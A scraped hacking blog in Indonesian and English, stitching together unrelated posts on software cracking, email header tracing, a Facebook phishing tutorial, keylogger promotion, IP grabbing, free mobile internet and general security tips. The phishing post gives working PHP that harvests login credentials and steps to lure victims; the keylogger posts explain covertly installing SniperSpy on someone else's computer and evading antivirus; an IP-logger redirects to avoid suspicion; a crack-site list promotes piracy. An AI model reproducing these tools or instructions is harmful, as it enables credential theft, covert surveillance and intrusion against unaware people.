Jika diterjemahkan dalam bahasa indonesia, patch berarti tambalan. Patch dalam dunia game pc merupakan tambalan / update dari suatu game untuk memperbaiki error / bug pada game, maupun menambah fitur suatu game. Patch untuk update game ini menggunakan UI (User Interface) agar user dapat dengan mudah mengupdate game favoritnya. Hanya tinggal tekan next, next, i agree, next, lalu update, Patch langsung mengupdate game tersebut secara otomatis. Menambal error dan menambah fitur.

Namun berbeda fungsi antara patch di dunia game dengan dunia pembajakan software, path pada dunia pembajakan memang juga mempunyai UI (User Interface). Namun fungsinya yang berbeda, patch ini menulis data pada bagian software dan registry. Yang biasa ditulisnya adalah file executable software tersebut. Ada juga crack yang menulis pada registry.

Itulah yang menjadi kelebihan patch, ada beberapa patch yang dapat digunakan pada software dengan versi berbeda. Jika ada patch dengan nama misal “Software A Universal Patcher”, berarti patch tersebut dapat digunakan untuk semua versi dari Software A, baik versi 1 maupun 9, patch tersebut tetap dapat digunakan. Lain halnya jika patch tersebut punya nama “Software A 1.xxx Patch”, berarti patch tersebut dapat digunakan pada semua Software A yang punya bersi mayor 1, misal Software A 1.3, Software A 1.8 dan lainnya asal versi mayor (utama) nya masih 1.

Hanya dengan menaruh patch di folder letak Anda menginstall software tersebut, jalankan Patch, dan tekan tombol “Patch”, maka seketika itu juga patch menulis beberapa data pada bagian software dan registry. Setelah proses patching sukses, kini software sudah menjadi full version / terdaftar (registered). Nah, software Anda kini berstatus patched.

Patch dibuat oleh perseorangan / berkelompok. Sama seperti crack, kelompok tersebut juga mempunyai nama masing – masing. Mereka juga merilis patch buatan mereka pada situs – situs crack. Pada umumnya, UI (User Interface) patch unik dan menarik, entah itu memang tradisi mereka atau apa. Sama seperti pembuat crack, pembuat pacth juga menaruh informasi mereka bersama dengan patch yang mereka rilis, indormasi itu berbentuk file berekstensi *.nfo.

3. Keygen

Keygen, merupakan kependekan dari Key Generator. Sebuah program yang dapat menghasilkan serial untuk suatu software. Serial yang dihasilkan oleh sebuah Keygen dapat bermacam – macam dan berbeda, namun tetap mempunyai pola yang sama namun berbeda, contoh mudahnya:

* Serial yang dihasilkan pertama: A1A23
* Serial yang dihasilkan kedua: B2B34
* Serial yang dihasilkan ketiga: C3C45

Nah, seperti itulah contoh mudah pola serial yang dihasilkan oleh sebuah Keygen, namun lebih rumit lagi.


Sebagai contoh saja, ini sedikit daftar situs – situs crack… :)

* cracks.am ==>
* keygen.us ==>
* allcracks.net ==>
* andr.net ==>
* crack.ms ==>
* crackz.ws ==>
* cybercracks.co.uk ==>
* crackarchive.com ==>
* crackdb.com ==>
* crackzplanet.com ==>
* crackway.com ==>
* mscracks.com ==>



Bookmark and Share


0
Backtracking E-mail

.
Ask most people how they determine who sent them an email message and the response is almost universally, “By the From line.” Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The “From” header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the “From” header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I’ve changed my email address and the name of my server for obvious reasons. I’ve also double spaced the headers to make them more readable.

Return-Path: < s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])

by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7

for < davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID:

From: “Maricela Paulson” < s359dyxtt@yahoo.com>

Reply-To: “Maricela Paulson” < s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels…isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary=”MIMEStream=_0+211404_90873633350646_4032088448″

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn’t come from yahoo’s email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here’s is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)

12.0.0.0 – 12.255.255.255

Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)

12.218.168.0 – 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15

# Enter ? for additional hints on searching ARIN’s WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost

Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com

Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom’s web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host’s IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

Source: Go Hacking


Bookmark and Share



23
Phishing Facebook Tutorial

.
This tutorial will tell u abt how to make a fake login page and tap your victim by Phishing just as the way fish falls to the trap

1.) First part:Creating the Fake Login Page.

In this part of the tutorial I’m going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Facebook as an example.

Part 1:

First we create a PHP script that will save the passwords in a text file.

Part 1:

First we create a PHP script that will save the passwords in a text file.

1.) Open notepad and put this code:

header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>

2.)Now save this as phishing.php

Note:

header (‘Location: https://login.facebook.com/login.php ’);

This URL is where the victim is redirected after logging in to you fake page.
The best way to do this is to go to the original site(in this case facebook) and try to login without username and password. Of course then the site will tell you that the username/password incorrect.Now copy that url and paste in that part of the phish.php script. As you can see the Facebook has got “https://login.facebook.com/login.php“

Now we have succesfully created the script that will save the password in a text file which will be later used to see logged victim password’s.

Part 2:

Now we go to http://www.facebook.com and right click / View Source.
Now we need to find the place where LOGIN button in facebook page send the user after clicking on it.
To do that we search for something like:

CODE

action=anything.

In this case we have:

action=”https://login.facebook.com/login.php?”

We replace that part with:

action=”phishing.php”

Then we copy the whole source and save this file as login.php.

Now upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go. Just give your victim the link to your Login.php file and every time they login that php script will create a file titled passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.

The phishing link should be something like this:

http://somewebhosting.com/login. php —> Send this to your victim

And the txt file with the passwords like this:

http://somewebhosting.com/passwords.txt —> View the passwords with this one.

Still having trouble with phishing??? i can make it much easier for u, Ma friend frm Cyber Terrorist Team have made a software for people like u, to make it simple… Just Download the Application frm here, these will generate all the necessary phishing.php and login.php for u, You just need to upload it in some web host and send the link to Your friends to hack passwords…

DOWNLOAD SUPER FISHING


How to Use it:

1. Enter the URL of the login page( any social network site) in the first text box…

2. Name of the log file : were the passwords of victim is stored, name it as u want ie. anyname.txt

3. Name of login page, mostly login.php

4. Redirection : enter the login page of the website, u wnat to phish, for ex: www.facebook.com is u wanna phish, You should make https://login.facebook.com/login.php this link there…

5. finally click Build Phisher, it will generate output…

Source: Go Hacking


Bookmark and Share


15
Agar Terhindar dari KeyLogger

.
Setelah mengetahui hal tersebut, maka sebelum kita menggunakan computer, maka kita
periksa dulu apakah computer yang akan kita pakai dipasang keylogger atau tidak.
Langkahnya adalah sebagai berikut :

Tekan kombinasi Tombol Ctrl+Shift+Alt+F, jika tidak muncul Icon keylogger berarti kita aman untuk melanjutkan

Jika muncul Icon keylogger, maka matikan keylogger dengan cara klik kanan icon
keylogger, kemudian klik Exit, seperti Gambar di bawah.



Dengan melakukan langkah tersebut, maka kita akan aman mengetik dengan puas tanpa
ada gangguan dari mata-mata pengintai password.

Semoga materi ini bermanfaat…


Bookmark and Share



2
Mempercepat PC Yang Lambat.

.
program yang berjalan:

Ini adalah alasan terbesar dan bisa diperbaiki dengan cepat dan gratis. . . mungkin saja komputer Anda mungkin memiliki begitu banyak latar belakang program yang berjalan secara bersamaan bahwa tidak ada cukup sumberdaya untuk berjalan normal.

Hasil akhir dari hal ini adalah bahwa komputer Anda mulai menjalankan lebih banyak dan lebih lambat dari waktu ke waktu ketika Anda menambahkan program lain.

Ada dua solusi, mendapatkan Anti-Spyware dan menggunakan fitur yang memungkinkan Anda untuk melihat program yang sedang dijalankan dan untuk menonaktifkan semua program yang sedang dijalankan tersebut. Atau, jika Anda ingin masuk ke sistem anda dengan tangan kosong, gunakan obat di bawah ini.

Cara menonaktifkan program yang tidak diperlukan latar belakang:

Semua ikon di baki sistem komputer anda adalah latar belakang program menggunakan memori. Ada lebih, tetapi Anda akan mendapatkan petunjuk dari system tray. Untuk melihat dan keluar semua menjalankan program latar belakang:

Windows 95 - ME

a. Tekan tombol Ctrl + Alt + Delete kunci pada waktu yang sama.

b. Klik setiap program atau tugas kecuali Explorer atau Systray,

c. dan kemudian klik End Task.

Ulangi langkah b dan c untuk keluar dari semua program kecuali Explorer dan Systray yang diperlukan komponen dari Microsoft Windows.

Anda seharusnya sudah memiliki sistem yang bersih. Apakah komputer berjalan seperti dulu. . . jika itu terjadi, Anda akan ingin untuk mencegah program-program tersebut dapat me-restart waktu berikutnya Anda menjalankan komputer.

Jika Anda tidak ingin ada program latar belakang dimulai ketika Anda me-restart sistem, dan kau tahu apa yang Anda lakukan, Anda dapat menjalankan msconfig dari menu run dan sepenuhnya menonaktifkan apa yang Anda temukan dalam 'Startup' tab. Jika Anda tidak berpengalaman dan Anda ingin cara yang aman untuk menonaktifkan semua program yang tidak dibutuhkan latar belakang, mendapatkan obat direkomendasikan untuk spyware pada halaman ini. Ini memiliki fitur yang memungkinkan Anda untuk menonaktifkan program-program startup dengan aman.

Windows XP melalui 2003 Server

a. Tekan tombol Ctrl + Alt + Delete kunci pada waktu yang sama.

b. Pilih 'Task Manager' tab untuk melihat dan mengakhiri program yang sedang dijalankan.

c. menonaktifkan program ini akan mengharuskan Anda mengubah startup properti di 'Administrative Tools' area sistem anda. Windows Help menu akan membimbing Anda meskipun proses jika Anda mencari 'menonaktifkan program' di bagian bantuan Anda.

Spyware:

Banyak jenis perangkat lunak tambahkan sendiri untuk sistem anda menu start tanpa meminta izin Anda. Kadang-kadang Anda akan mengklik link atau mengunjungi situs web yang hacker menginstal spyware pada komputer Anda tanpa Anda tahu. NOADWARE adalah apa yang saya gunakan dan bebas untuk mencoba.

Terfragmentasi hard drive:

Ini hasil dari program-program yang diambil dan dihapus. Menjalankan hard drive Window Defragmenter (defrag) sebulan sekali. Hal ini di bawah menu Tools Sistem. Komputer Anda menu bantuan akan memberitahu Anda bagaimana untuk melakukannya.

Masalah lain: (Mungkin, tapi tidak menyebabkan masalah)

Anda bisa lama atau bertentangan Windows device driver. Sebuah contoh akan Anda mungkin benar-benar memiliki dua driver video sama sekali berbeda pada sistem anda dan Windows benar-benar bisa bergantian menggunakan keduanya.

Untuk mencegah masalah ini, Pertama boot komputer di Safe Mode dengan menekan terus tombol F8 ketika startup, setelah memeriksa memori DOS telah selesai.

Sementara di Safe Mode pilih Start / Settings / Control Panel / System / Devices. Klik pada semua perangkat dan melihat apakah berbagai driver memiliki kuning atau tanda seru merah (yang menunjukkan konflik driver) dan juga menentukan apakah ada duplikat driver yang dapat dihilangkan.

Anda mungkin harus menghapus dan reload driver untuk memperbaiki masalah ini. Duplikat driver dapat dan harus dihapus.

Karena setiap program Windows baru terinstal dan uninstall, itu meninggalkan bagian-bagian sendiri yang dapat memperlambat atau crash komputer Anda. Ini adalah sebagian besar. dll dan file berbagi.

Itu juga sangat mungkin ketika menguninstall sebuah program yang membutuhkan file-file sistem Windows dapat dihapus. Ketika komputer anda akan bertanya apakah Anda ingin menghapus file-file berbagi biasanya paling aman untuk mengatakan tidak - bahkan jika Anda mengklaim program menghapus file-file tersebut tidak sedang digunakan.

Old Windows driver dapat ditemukan oleh boot ke Safe Mode, kemudian membuka Control Panel / System / Devices dan Ridding sistem anda driver lama.

Jika tidak, satu-satunya jawaban untuk masalah ini adalah untuk mengambil KESALAHAN DOKTER atau hanya reload Windows ke direktori baru yang lama menghilangkan semua file sampah dan sisa. Refresh Windows adalah sesuatu untuk dilakukan terakhir, karena anda akan juga harus reload semua pengaturan Windows Anda, driver, dan program.

Anda dapat kekurangan memori sistem - Satu-satunya saat ini mungkin menjadi masalah adalah jika Anda memiliki sistem yang lebih tua dan meng-upgrade sistem operasi Anda tanpa menambahkan beberapa memori. Anda mungkin harus upgrade ke 256 atau 512 atau lebih dari memori sistem, sementara itu tidak bebas, hal itu tidak terlalu mahal seperti itu pada satu waktu. Periksa Tiger langsung untuk menemukan transaksi-transaksi besar pada memori.


Bookmark and Share


2
Mencegah Serangan Keylogger

.
Jika komputer anda terinfeksi keylogger, menghapusnya dengan program seperti Microsoft AntiSpyware hanya langkah pertama pembersihan. Jika keylogger sudah lama berada pada PC anda, maka kemungkinan besar satu atau beberapa orang sekarang mempunyai akses ke sebagian informasi pribadi anda, termasuk username dan password.

Seteleh menghapus keylogger, reboot dan lakukan pemeriksaan lagi untuk memastikan keylogger telah hilang selamanya. Setelah itu ganti semua password anda yang berhubungan dengan e-mail account, online banking, prgram instant messaging, situs lelang online, dan seterusnya. Meskipun orang yang menginstalasi keylogger hanya ingin memata-matai aktivitas berkomputer anda, bisa saja mereka juga mengejar detail user account. Dengan mempunyai informasi yang cukup, mencuri identitas (belum lagi uang anda) adalah pekerjaan mudah.

Anda harus memikirkan bagaimana program tersebut awalnya bisa masuk. Apakah user lain menginstalasinya? apakah di-download dari internet? apakah anda mempunyai firewall, antivirus, dan anti-spyware telah di update dan melindungi anda sepanjang waktu? Hal positif dari keylogger adalah peningkatan kewaspadaan keamanan yang disebabkannya. Tidak seorangpun suka dimata-matai. jadi lakukan tindakan yang diperlukan untuk memastikan keylogger tidak lagi masuk ke komputer anda.

Berikut adalah lima cara yang dapat anda lakukan untuk mendeteksi spyware dan pencegahannya :

1. Instalasi filter spyware pada host. Banyak scanner spyware yang tersedia di pasaran. Jika anda mencari solusi yang tidak terlalu mahal, coba gunakan tool beta Microsoft, Windows Spywares, Spybot, dan AdAware. Banyak vendor antivirus komersial, seperti McAfee, juga mempunyai filter spyware digabungkan ke dalam solusi antivirus korporat.
2. Instalasi suatu aplikasi gateware dengan filtering content spyware. Jika tadi pada tingkat host, maka sekarang kita lihat solusi spyware yang beroperasi pada tingkat jaringan. Salah satunya adalah Blue Coat Spyware Interceptero. Jika anggaran anda mencukupi, pertimbangkan untuk menggunakan solusi ini.
3. Buat egress filter pada jaringan anda. Tidak ada salahnya untuk membuat filter egress pada jaringan. Mereka bisa membantu dalam memblokir spyware yang mencoba “menelpon rumah”.
4. Monitor intrusion-detection system (IDS) anda dan jaga signature tetap terbaru. jika anda tidak bisa memblokir spyware dari menelpon rumah, paling tidak anda bisa mendeteksinya dengan IDS dan menggunakan laporannya untuk mengidentifikasi sistem yang terinfeksi.
5. Cegah user mengistalasi software download. Kebanyakan instalasi spyware disebabkan oleh user yang menginstalasi software yang di-download dari internet. Jika memungkinkan awasi aktivitas tersebut.

Spyware dan pengambil data yang sejenis merupakan salah satu tantangan paling penting yand dihadapi oleh profesional security informasi. Sudah saatnya memastikan organisasi anda dalam keadaan aman. Dengan mengikuti langkah di atas akan membantu anda dalam mencapai tujuan tersebut.

Source: Fakhrul


Bookmark and Share


29
Ardamax Keylogger 3.0

.
Ardamax Keylogger 3.0 adalah software keylogger yang bisa anda gunakan untuk merecord dan merekam aktifitas user komputer dan menyimpannya dalam bentuk logfile. Ardamax Keylogger 3.0 sangat mudah digunakan dan diinstall. logfile dari Ardamax Keylogger 3.0 bisa dibuka sebagai file teks maupun web page. Anda bisa mengetahui semua kegiatan dan aktivitas user komputer anda dengan Ardamax Keylogger 3.0. Ardamax Keylogger 3.0 akan merekam mulai dari tombol keyboard yang ditekan dan semua aktivitas lainnya.

Fitur Ardamax Keylogger 3.0 :
1. berjalan secara hidden atau tersembunyi sehingga user tidak mengetahui bahwa aktivitas mereka sedang dimonitor.
2. memonitor tiap huruf dan karakter yang di tekan oleh user selama beraktivitas menggunakan komputer tersebut.
3. bisa mengirim log file ke email yang kita inginkan
4. dilengkapi dengan time tracking yang akan merekam setiap aktivitas user dilengkapi dengan waktu saat aktivitas tersebut dilakukan
5. berjalan secara otomatis saat komputer dihidupkan tanpa diketahui oleh user komputer anda.
6. anda bisa membuka file log sebagai teks atau sebagai web page
7. mudah digunakan dan mempunyai interface yang user friendly

Download disini


Bookmark and Share


0
Free Internet using Sim

.
Sim hack: works on idea and airtel (havent tested in other sim’s)

First Lets Start with the requirments:

1. You Need a sim with minimum of 0.20 credit in it or even with no credit,but make sure the gprs signal is visible.
2. You need a phone that can be used as a modem to connect your computer to the internet. Such as Nokia phones with Nokia PC suite software or Motorola Phones with M Phone tools software.
3. You Need a Computer or Laptop
4. You need to register on your freedom and get your username and password to use the software.

(your registered username and details of registeration will be sent to the email u used in registering,it might take a while for ur account to be authenticate

5. Download Your Freedom from here: http://www.your-freedom.net/index.php?id=3 (use the latest version)

NOW LETS START SETTING UP YOUR COMPUTER YOUR FREE BROWSING!!

1. Dowload and Install Your-Freedom and enter these settings.
Let me just explain everything step by step. Open Your-Freedom
-Click on the status tab. Then clicked on configure.
- On the server connection tab.Use these settings:
Address: ems24.your-freedom.de
Port:53
Connection Mode: UDP
now on the option below it
check boxes Numbers 3,5,6,7,8

Next Click on Account Information and enter the username and password you recieved when you registered
Next Click on Proxy Settings Tab and enter these settings.
Proxy Address: 94.126.16.6.7
Proxy Port:53
Proxy Username: “leave this blank”
Proxy Password: “leave this blank”
Proxy Domain: “leave this blank”
Proxy Type: HTTP/HTTPS
Proxy Authentication: Any or none
User Agent: “leave this blank”

FTP Proxy Server:
Proxy Address “leave this blank”
Proxy Port: “leave this blank”
Now click on Save and Exit.

Now on the Your-Freedom Menu. Click on ports and tick OPEN VPN, SOCKS 4/5, and WEB PROXY,
Click on messages
Check Auto scroll
minimum level – DEBUG
CLICK ON APPLICATION,tick the browsers and instant messanges you will use and then click ok

Now download Firefox or any other browser. its better to download firefox :) and just follow the below configuration

open firefox goto – tools – options -Advanced – Network – settings – clik on Manual Proxy configuration. Then for http,ssl,ftp,gopher enter as localhost posrt:8080 for socks host localhost port: 1080. in No proxy for: localhost, 127.0.0.1

click ok…

now make a default connection using ur PC suite and check wether the gprs signal is present in the mobile.. make a new connection and open your freedom now, click start connection and Njoy free internet… Happy hacking..

source: Go-Hacking


Bookmark and Share


0
Trace IP Address

.
Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

1. Download the IP Finder script (IP_Finder.ZIP) that I have created.

2. Open a new account in X10Hosting (or any free host that supports PHP).

3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.

4. You can rename the ip.php to any name of your choice.

5. Set the permission to 777 on ip_log.txt.

Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.

For your better understanding let’s take up the following example.

Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be

http://abc.x10hosting.com/ip.php

You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

To find the recorded IP address check the logs using the following link.

http://abc.x10hosting.com/ip_log.php

The sample log will be in the following format

79.92.144.237 Thursday 17th of March 2010 05:31:27 PM
59.45.144.237 Thursday 17th of March 2010 05:31:28 PM
123.92.144.237 Thursday 17th of March 2010 05:31:31 PM

NOTE: You have to replace abc with your subdomain name.

Source: Go-Hacking


Bookmark and Share


0
Tips for Online Security

.
With the sudden rise in the Internet usage across the globe over the past few years, there has also been a rise in the amount of online scams and frauds. Today most of the Internet users are unaware of the most prevailing online threats which pose a real challenge for their safe Internet usage. As a result, Online Security has become a questionable factor for the most Internet users. However it is still possible to effectively combat online insecurity provided that the users are well aware of the common scams and frauds and know how to protect themselves. A study shows that over 91% of the Internet users are unaware of the online scams and are worried about their security. Well if you are one among those 91% then here is a list of 10 tips to ensure your total online security.

1. Always install a good antivirus software and keep it up-to-date. Also install a good anti-spyware to keep your PC away from spywares.

2. Always visit known and trusted websites. If you are about to visit an unknown website, ensure that you do not click on suspectable links and banners.

3. Perform a virus scan on the files/email attachments that you download before executing them.

4. Regularly Update your operating system and browser software. For a better security it is recommended that you surf the Internet through the latest version of your browser program.

5. Never share your password (email, bank logins etc.) with any one for any reason. Choose a strong password (A blend of alphanumeric+special symbols) and change it regularly, eg. every 3 months. Avoid using easy-to-guess passwords. (ex. pet’s name or kid’s name)

6. Always type the URL of the website in your browser’s address bar to enter the login pages. For ex. To login to your Gmail account type http://mail.google.com

7. Before you enter your password on any login page, ensure that you see https instead of http. ex. https://mail.google.com instead of http://mail.google.com. HTTPS protocol implements SSL (Secure Sockets Layer) and provide better security than a normal HTTP.

8. Beware of phishing emails! Do not respond to any email that request you to update your login details by clicking on a link in the body of the email. Such links can lead to Fake Login Pages (Spoofed Pages).

9. Always hit the logout button to close your login session rather than abruptly terminating the browser window. And clear your web browser caches after every session to removethe temporary files stored in the memory and hard disk of your PC.

10. Avoid (Stop) using any public computers or computers in the Internet cafes to access any sensitive/confidential information. Also avoid such computers to login to your email/bank accounts. You cannot be sure if any spyware, keystroke-logger, password-sniffer and other malicious programs have not been installed on such a PC.

Source: Go-Hacking


Bookmark and Share




0
Anonymous E-mails

.
Do you want to block emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well here is a way to block all those unwanted and annoying emails that you do not want to see or read! With this trick you can block individual email address or the whole domain from which you do not want the emails to come from. Here are the step-by-step instructions to do this.

For Gmail

1. Login to your account

2. At the top-right corner, click on Settings

3. Under Settings, click on Filters

4. You’ll now see an option “Create a new filter“, click on it

5. Now in the From field enter the email address from which you do not want to receive the emails

For ex. you may enter ujie@gmail .com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax: *@xyz.com. Now all the incoming emails from the domain xyz.com will be blocked.

6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.

For Yahoo

1. Login to your account

2. At the top-right corner, click on Options

3. A drop down menu appears, now click on More options

4. In the left panel select the option Filters and click on create or edit filters

5. Now click on Add

6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.

Fox ex. ujie@gmail.com or if you want to block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail

1. Login to your account

2. At the top-right corner, click on Options

3. A drop down menu appears, now click on More options

4. Click on Safe and blocked senders link under Junk e-mail

5. Now click on Blocked senders

6. Type in the email address that you want to block under blocked e-mail address or domain field.

For ex. Enter ujie@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.

Source: Go-Hacking

Bookmark and Share



8
Invisible Password Protected Folder

.
Do you want to password protect your folder? Do you want to make it invisible so that it remains unnoticed by the normal users? Well here is a way to do that. In this post I will show you how to make a password protected folder in Windows without using any additional software. Here is is step by step procedure to create a password protected folder.

How to create a Password Protected Folder

Step-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.

Step-2: Now in this folder place all the important files, documents or any folders that you want to password protect.

Step-3: Now Right-click on this folder (ABC) and select the option Send To ->Compressed (zipped) Folder.

Step-4: Now a new compressed zipped folder gets created next this folder (ABC) with the same name.

Step-5: Double-click on this compressed zipped folder and you should see your original folder (ABC) here.

Step-6: Now goto the File menu and select the option Add a password.

ie: File -> Add a password

Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

How to make it Invisible

Step-1: Now Right-click on this password protected folder and select Properties.

Step-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).

Step-3: In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options

* Do not show hidden files and folders
* Show hidden files and folders

Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.

Source: Go-Hacking


Bookmark and Share


2
Keyloggers : Configure

.
Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc.

WARNING: I highly recommend that you read this post completely since every single piece of information is important.

I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go…

1. What is a Keylogger?

A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Keylogger works?

Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://mail.yahoo.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.

3. How to install the keylogger?

A keylogger can be installed just like any other program. Just follow the screen instructions and you’re done.

4. Do I need any special knowledge to install and use the keylogger?

Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.

5. Once I install the keylogger can the victim come to know about it’s presence?

No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.

6. Can I be traced back if I install the keylogger on some other computer?

No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.

7. Which keylogger is the best?

Today there exists hundreds of keyloggers on the market and most of them are no more than a scam. So I tested some of the top keyloggers and conclude that the following is the best one.
SniperSpy

8. How SniperSpy works?

I will try to explain the working of Sniperspy in simple steps.

1. After you purchase Sniperspy, you’ll be able to create the installation module using easy set-up program. You need to email this module to the remote user as an attachment.

2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.

3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password.

9. I don’t have physical access to the traget computer. Can I still use SniperSpy?

Yes you can. SniperSpy supports REMOTE INSTALLATION feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation all you need to do is just place the module (refer FAQ-8) in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).

10. Can I install SniperSpy on a local computer?

If you need to install to your local (current) computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module ( Refer FAQ-8). Double-click the module filename to execute it. Nothing will appear on the screen as the software is installed.

11. What if the antivirus block from sending it as an email attachment?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

12. Why SniperSpy is the best?

* SniperSpy supports REMOTE INSTALLATION feature. This feature is not present on most of the keyloggers.
* SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista and bypasses ANY Firewall.
* SniperSpy is more reliable than any other keylogger program. You need not rely on your email account to receive the logs. Instead you can just login to your online SniperSpy account to receive the logs.
* SniperSpy captures full-size screenshots of the activities on the target PC.
